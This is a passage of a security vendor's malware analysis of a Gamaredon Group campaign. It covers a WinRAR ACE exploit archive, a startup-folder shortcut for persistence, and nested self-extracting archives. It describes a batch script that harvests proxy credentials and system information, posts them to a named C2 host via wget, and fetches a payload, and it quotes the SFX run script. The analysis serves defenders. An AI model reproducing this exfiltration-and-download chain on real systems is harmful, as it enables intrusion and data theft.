{"id":16137,"date":"2019-08-21T20:40:11","date_gmt":"2019-08-22T04:40:11","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/08\/21\/news-9880\/"},"modified":"2019-08-21T20:40:11","modified_gmt":"2019-08-22T04:40:11","slug":"news-9880","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/08\/21\/news-9880\/","title":{"rendered":"The Gamaredon Group: A TTP Profile Analysis"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis<\/i><\/b><\/p>\n<p> FortiGuard Labs recently discovered a fresh malicious campaign being run by the Gamaredon Group possibly targeting Ukrainian law enforcement and government agencies. We decided to provide an analysis of the current campaign, particularly focusing on the tools and methods used by these malicious actors to try to understand their methodologies and what resources are needed to launch these types of attacks.<\/p>\n<p>The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s. In one <a href=\"https:\/\/kharkivobserver.com\/ukraine-as-testing-ground-for-russian-cyber-attacks-deterrence\/\">article<\/a> published in the Kharkiv Observer \u2013 an independent Ukranian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group. In addition, the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers.<\/p>\n<p>The group is very active. In addition to the campaign we will analyze in this report, they are also <a href=\"https:\/\/www.intezer.com\/blog-evilgnome-rare-malware-spying-on-linux-desktop-users\/\">implicated<\/a> in the spreading of a new Linux malware \u2013 Evil Gnome.<\/p>\n<p>The Gamaredon Group has been active for more than 6 years, and during that time, their Tactics, Techniques, and Procedures (TTPs) have mostly remained the same. They primarily target Ukrainian organizations and resources using spear-phishing attacks, and they use military or similar documents as bait. Once they have found a victim, they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files.<\/p>\n<h2>Current Campaign Analysis<\/h2>\n<p>As an example, we decided to analyze one of their latest samples. The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content. In this case, it looked like someone was using the military conflict in Ukraine to deliver some sort of malware. A quick search for those patterns gave us the source of the archive \u2013 the Gamaredon Group.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_956427934.img.png\" alt=\"Figure 1. Files inside the archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. Files inside the archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The archive contains several decoy files:<\/p>\n<ul>\n<li>1_\u041c\u0438\u0440\u043e\u0442\u0432\u043e\u0440\u0435\u0446\u044c\u0437\u0430\u044f\u0432\u0430.jpg\n<ul>\n<li>Translation: Peacemakerstatement.jpg<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>2_\u041fi\u043d\u0447\u0443\u043a\u041fi\u043d\u0447\u0443\u043a \u0410\u043d\u0434\u0440i\u0439 \u042e\u0440i\u0439\u043e\u0432\u0438\u0447 27.12.1997.docx\n<ul>\n<li>Translation: PinchukPinchuk Andrey Yuriyovych 27.12.1997.doc<\/li>\n<li>Andrey Pinchuk is a Ukranian politician with alleged ties to Russia<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>3_\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e \u0414\u043c\u0438\u0442\u0440\u043e \u0412\u0430\u0441\u0438\u043bi\u0439\u043e\u0432\u0438\u0447 06.01.1966.docx\n<ul>\n<li>Translation: Havchenko  Havvchenko Dmitry 06.01.1966.doc<\/li>\n<li>Dmitry Havchenko is a Ukranian entrepreneur involved in Ukranian politics who owns the cryptocurrency exchange WEX.<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>D3i_GMCWAAAq_8u.jpg<\/li>\n<li>ssu_zakon.docx\n<ul>\n<li>Translation: Security Service of Ukraine_The Law.docx<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>Several text files<\/li>\n<\/ul>\n<p>All of the text files contain old phone billing information, as well as coordinates, numbers, and addresses. We cannot determine if this information is real or not. Even if it is, this kind of data can be easily found in public domains.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1491654123.img.png\" alt=\"Figure 2. Billing data \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Billing data <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Another file is used as bait is called ssu_zakon.docx. This document is just a note regarding the Security Service of Ukraine (SSU) law.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_309404618.img.png\" alt=\"Figure 3. Contents of ssu_zakon.docx\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. Contents of ssu_zakon.docx<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The archive also contains 2 MS Office documents named correspondingly for the names stated on the decoy image &#8211; Pinchuk Andriy Yuryevich 27.12.1997.docx and Havchenko Dmitry Vasilyevich 06.01.1966.docx.<\/p>\n<p>The document names are written in Ukrainian, while the content is written in Russian \u2013 and in fact, is just the translated text from the decoy image. The text provides brief information on two persons, listing the address of their registration and information about their military careers.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_80944469.img.png\" alt=\"Figure 4. Corresponding document contents\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4. Corresponding document contents<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Checking the metadata of two documents, we observed the following:<\/p>\n<ul>\n<li>2_\u041fi\u043d\u0447\u0443\u043a\u041fi\u043d\u0447\u0443\u043a \u0410\u043d\u0434\u0440i\u0439 \u042e\u0440i\u0439\u043e\u0432\u0438\u0447 27.12.1997.docx\n<ul>\n<li>Created: 10.04.2019 07:33:00<\/li>\n<li>Modified: 10.04.2019 07:34:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li>3_\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e\u0425\u0430\u0432\u0447\u0435\u043d\u043a\u043e \u0414\u043c\u0438\u0442\u0440\u043e \u0412\u0430\u0441\u0438\u043bi\u0439\u043e\u0432\u0438\u0447 06.01.1966.docx\n<ul>\n<li>Created: 10.04.2019 07:35:00<\/li>\n<li>Modified: 10.04.2019 07:35:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li>ssu_zakon.docx\n<ul>\n<li>Created: 28.01.2019 06:42:00<\/li>\n<li>Modified: 05.04.2019 05:05:00<\/li>\n<li>Created by: <b style=\"\">USER<\/b><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The files \u0437\u0430\u044f\u0432\u0430.jpg (statement.jpg) and D3i_GMCWAAAq_8u.jpg are the same. The original source of this picture is a post on a website called Mirotvorets (Peacemaker). The website is known for publishing the personal information of people who are considered to be \u201cenemies of Ukraine.\u201d<\/p>\n<p>The text on the pictures below talks about Crimea, the military conflict, and about two people who are suspected of sponsoring the Presidential election campaign of the current president of Ukraine (Volodymyr Zelensky).\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_593548756.img.png\" alt=\"Figure 5. Decoy images\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5. Decoy images<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The image date on the image is 7 of April 2019. This is the same day it was published on the Mirotvorets website. But one interesting fact is that WinRAR shows the last modification date as 21.02.2019 22:03:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_306575313.img.png\" alt=\"Figure 6. File last modification time\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6. File last modification time<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To understand this time-travel mystery, we decided to check the ACE archive structure.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_142038023.img.png\" alt=\"Figure 7. ACE archive structure information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7. ACE archive structure information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you can see on figure 7, the ACE archive contains a date field in MS-DOS format.<\/p>\n<p>If we convert 02\/\u200e21\/\u200e2019, \u200f\u200e22:03:06 to an MS-DOS timestamp, we get 0x4E55B063. This would be written as 0x63B0554E in little-endian ordering. Checking our archive, we can find the corresponding field:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1873269165.img.png\" alt=\"Figure 8. Timestamp hex value\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8. Timestamp hex value<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Now, if we search for it using x63xB0x55x4E, we find <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/commits\/master\/modules\/exploits\/windows\/fileformat\/winrar_ace.rb\">this<\/a> module for a Metasploit Framework:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1276104487.img.png\" alt=\"Figure 9. Same value in the Metasploit module \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9. Same value in the Metasploit module <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Searching further, we observed an earlier <a href=\"https:\/\/github.com\/manulqwerty\/Evil-WinRAR-Gen\/blob\/master\/evilWinRAR.py\">Proof of Concept<\/a> script that was published on the 27<sup>th<\/sup> of February, 2019.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_362158166.img.png\" alt=\"Figure 10. Unacev2.dll vulnerability PoC\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10. Unacev2.dll vulnerability PoC<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The date listed in the archive was pre-defined and inserted by generator scripts. This fact gives us the idea that the attackers are utilizing publicly available scripts to pack their payload. The only real timestamps we can currently trust are the timestamps extracted from MS Office document metadata. Those are 05.04.2019 and 10.04.2019. Besides the date and time information, we also have a very generic username of the file creator: USER.<\/p>\n<h2>Exploit Analysis<\/h2>\n<p>The exploit drops three files on the file system. Each of them has their own application:<\/p>\n<p>First, the shortcut called \u201cGoggle Chrome.lnk\u201d is placed on the users\u2019 desktop. As you can see in figure 11, the actor misspelled the browser name. This shortcut is intended to be clicked on by the user instead of the proper \u201cGoogle Chrome\u201d browser. The shortcut has a hardcoded path to the icon, so the proper image will be shown only if the user has the browser installed on their computer.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--offset--default--4 aem-GridColumn--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_300088222.img.png\" alt=\"Figure 11. Misspelled shortcut \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11. Misspelled shortcut <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Next, the same shortcut is placed in the Startup folder at %AppData%RoamingMicrosoftWindowsStart MenuProgramsStartupGoggle Chrome.lnk. This time, the shortcut is placed for persistence purposes. The files in the startup folder will be executed once the user logs into the system. That way, in case the desktop shortcut hasn\u2019t been clicked by the user in the current session, the startup file is the backup for the attacker so it can be executed at the next system reboot or user login.<\/p>\n<p>And finally, the executable file called \u201cwin.exe\u201d is placed in the users\u2019 directory at %userprofile%win.exe.<\/p>\n<h2>Analyzing the win.exe File<\/h2>\n<p>The file, dropped to the user folder, is a password-protected self-extracting RAR archive. The file has a compilation date of 24.04.2017 18:45:49 (GMT).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1209300449.img.png\" alt=\"Figure 12. Executable file compilation timestamp\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12. Executable file compilation timestamp<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Knowing the self-extracting archive compilation date allows us to find the WinRAR software version used by the attacker. When the SFX archive is created, the compilation date is set close to the timestamp of the corresponding version of the WinRAR software used. So, the only version that could give that timestamp is WinRAR 5.50 Beta 1 (x86). Its installer file has its timestamp set to 24.04.2017 18:46:00 (GMT), which is 1 second different from the SFX malware. Trying to create a self-extracting archive with this version, we got the same date as the one stated in the malware.<\/p>\n<p>Additionally, the malicious self-extracting archive contains a fake digital signature of a legitimate Microsoft tool &#8211; SysInternals Autoruns. As you can see in the figure below, the signature fails to pass validation:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_627696450.img.png\" alt=\"Figure 13. Fake digital signature\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13. Fake digital signature<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Moving on, to get the archive password we have to check the shortcut that is linked to it.\u00a0 \u00a0\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_677588385.img.png\" alt=\"Figure 14. Password inside the shortcut\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14. Password inside the shortcut<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Once we have a password, we can check the internals of the win.exe file. As can be seen in figure 15, it contains another executable file called winlog.exe. Besides that, it has an embedded SFX script that is executed when the archive data is extracted:<\/p>\n<ul>\n<li>Setup = winlog.exe<b> (<\/b>Execute after extraction)<\/li>\n<li>Silent = 1 (No windows are shown)<\/li>\n<li>Overwrite = 2 (Do not overwrite)<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_2040208796.img.png\" alt=\"Figure 15. Contents of \u201cwin.exe\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 15. Contents of \u201cwin.exe\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Let\u2019s unpack this file and analyze its content.<\/p>\n<p>The file is a 7zip SFX archive that tries to look like a mysterious version of Email Microsoft Office Word software. This time, the file is even older than the previous SFX archive. Although the last modification date is set to 10.04.2019 13:55:42 (GMT), the compilation timestamp is 05.03.2016 12:06:17 (GMT). Unfortunately, none of the 7zip software release dates or versions corresponds to this timestamp, so our previous discovery technique did not work in this case.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_2130180410.img.png\" alt=\"Figure 16. Description of \u201cwinlog.exe\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 16. Description of \u201cwinlog.exe\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This self-extracting archive contains two files and a script that is launched at extraction:<\/p>\n<p style=\"margin-left: 40.0px;\">!@Install@!UTF-8!<br \/> RunProgram=&quot;hidcon:5493.cmd&quot;\u00a0 (Run batch file with hidden console window after extraction)<br \/> GUIMode=&quot;2&quot; (No windows are shown)<br \/> SelfDelete=&quot;1&quot; (Delete the archive after extraction)<br \/> ;!@InstallEnd@!<\/p>\n<p>To search for any hints of the software used to create this self-extracting archive, we looked into the file with just a text editor. Luckily, there was some information regarding the version and copyright.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_870421566.img.png\" alt=\"Figure 17. Copyright inside the archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 17. Copyright inside the archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This time, searching for the copyright, versions, and script we found a custom tool called Modified 7-Zip SFX module for installers, version 1.6.1 Stable build 3873 was used to create the malicious file. This tool is freely distributed on the Russian-speaking forum oszone. The custom software produces a 7zip SFX archive with exactly the same timestamp as the malicious file.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1356651672.img.png\" alt=\"Figure 18. Custom tool posted on the oszone forum \"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 18. Custom tool posted on the oszone forum <\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Next, let\u2019s analyze the files contained in the archive.<\/p>\n<p>The first one is called 5532.cmd, and it is a command prompt (batch) file. The second file is an executable and is called config.exe.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1092906739.img.png\" alt=\"Figure 19. Inside the 7zip SFX archive\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 19. Inside the 7zip SFX archive<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Looking into the batch file, we can see that it was not very obfuscated and therefore easy to read.<\/p>\n<p>The first thing we can see is the configuration information. It has a hardcoded C2 server, filename, and user-agent:<\/p>\n<ul>\n<li>hxxp:\/\/lisingrout.ddns[.]net<\/li>\n<li>librelogout.exe<\/li>\n<li>&quot;Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox\/27.0&quot;<\/li>\n<\/ul>\n<p>After the configuration variables we found the main routine. First, the malware extracts its proxy information from the registry key. HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings. It then saves the following information:<\/p>\n<ul>\n<li>ProxyServer (Proxy server address)<\/li>\n<li>ProxyUser (Proxy username)<\/li>\n<li>ProxyPass (Proxy password)<\/li>\n<\/ul>\n<p>Next, it gets the name of the computer and generates a unique ID. Once done, it calls \u00a0the systeminfo utility and saves the whole output to a text file that in our case called ohJlkad.txt:<\/p>\n<ul>\n<li>systeminfo &gt; ohJlkad.txt<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1012457418.img.png\" alt=\"Figure 20. Initial data collection code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 20. Initial data collection code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>After that, it waits for 40 seconds using the command:<\/p>\n<ul>\n<li>timeout \/T 40<\/li>\n<\/ul>\n<p>Once the timer ends, it will check for the internet connection by launching a ping command and sending 14 requests to google.com<\/p>\n<ul>\n<li>ping \u2013n 14 google.com<\/li>\n<\/ul>\n<p>Once finished, it kills the task with the filename stated in the configuration (\u201clibrelogout.exe\u201d) and deletes the file.<\/p>\n<p>Finally, it calls the config.exe application to provide several arguments:<\/p>\n<ul>\n<li>&#8211;user-agent = [hardcoded UA]<\/li>\n<li>&#8211;post-data=\u201d\n<ul>\n<li>versiya=wrar<\/li>\n<li>comp=%computername%<\/li>\n<li>id=[generated from computer name]<\/li>\n<li>sysinfo=[data from ohJlkad.txt]\u201d<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>\u201c[C2 Server]\u201d<\/li>\n<li>-q -N \u201c[C2 Server]\u201d<\/li>\n<li>-O \u201clibrelogout.exe\u201d<\/li>\n<\/ul>\n<p>In case the user is connected to the internet via proxy, it will provide additional arguments to config.exe:<\/p>\n<ul>\n<li>-e<\/li>\n<li>&#8211;http_proxy=http:\/\/[Proxy Server]<\/li>\n<li>&#8211;proxy-user=[Proxy username]<\/li>\n<li>&#8211;proxy-password=[Proxy password]<\/li>\n<\/ul>\n<p>Among the arguments, we see one interesting parameter: versiya = wrar. First, the word Versiya is the Russian \u0412\u0435\u0440\u0441\u0438\u044f or Ukranian \u0412\u0435\u0440\u0441\u0456\u044f, and it means version. As it is set to wrar, we can guess that it refers to the way the payload is being delivered. In this case, the initial file mirotvorec.rar contains an exploit for the WinRAR unacev2 module.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_752299263.img.png\" alt=\"Figure 21. Data exfiltration and payload dropping code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 21. Data exfiltration and payload dropping code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>After the config.exe returns, the script launches the main payload hosted on C2. To sum up the script routine, it takes the following actions:<\/p>\n<ul>\n<li>Collects information about the infected host<\/li>\n<li>Sends it to the C2 via config.exe<\/li>\n<li>Downloads and launches the main payload<\/li>\n<\/ul>\n<p>Analyzing the config.exe file, we found out that it is a legit wget version (v 1.11.4) with OpenSSL support compiled for Windows. The file is quite old, as the compilation date goes back to 2009. Apparently, the attackers decided to not reinvent the wheel and simply used an open-source solution for exfiltrating the host data and downloading the main payload.<\/p>\n<h2>Going Deep into the Shortcut<\/h2>\n<p>In addition to analyzing their techniques, we also decided to collect more information about the attackers. Fortunately, the shortcut they made will help us.<\/p>\n<p>The shortcuts used in Windows are small files that simplify our lives by providing a fast way to access files, applications, and URLs. Another fact is that the .lnk shortcuts help simplify the forensic analysis of malicious campaigns by providing the amount of the information hidden from the user.<\/p>\n<p>First, let\u2019s check the \u201cGoggle Chrome.lnk\u201d by opening its properties:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image.img.png\" alt=\"Figure 22. Artifacts in the shortcut\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 22. Artifacts in the shortcut<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>First, we see that the shortcut contains a Russian string \u0414\u043e\u0441\u0442\u0443\u043f \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 in the comment field, which translates to Access to the Internet. This text is shown if one hovers the mouse over the shortcut. The real Google Chrome shortcut will contain this comment and the text will depend on system language settings. So, we can guess that Windows with the Russian language pack has been used for forming the malicious 